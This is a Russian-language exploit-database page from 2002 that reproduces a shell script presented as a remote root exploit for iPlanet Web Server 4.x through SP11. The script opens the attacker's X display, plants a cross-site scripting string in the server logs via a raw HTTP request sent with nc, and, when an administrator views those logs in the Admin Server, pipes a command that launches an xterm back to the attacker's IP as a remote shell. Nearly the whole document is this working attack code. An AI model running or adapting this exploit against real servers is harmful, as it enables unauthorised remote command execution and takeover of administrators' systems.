iplanet-ngxss.sh

Свойства

Дата публикации:
20.11.2002
Описание уязвимости:
Выполнение произвольных программ в iPlanet Web Server

Код

Remote root exploit для iPlanet v4.x up to SP11. 

#!/bin/sh
#
# iPlanet Remote root exploit
# Tested versions: 4.* up to SP11
#
# By: Fermнn J. Serna CTO, NGSEC
# http://www.ngsec.com <fjserna@ngsec.com>
#
# Madrid, 09/10/2002

echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
echo "http://www.ngsec.com <fjserna@ngsec.com>"
echo

if [ $# != "3" ]
then
echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
exit
fi

echo "1.- Setting xhost +$1"
xhost +$1
echo

echo "2.- Building XSS string:"
CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
echo $CADENA
echo

echo "3.- Sending HTTP request:"
SEND="GET /$CADENA HTTP/1.0"
echo "$SEND"
(echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
echo
echo

echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
echo


или введите имя

CAPTCHA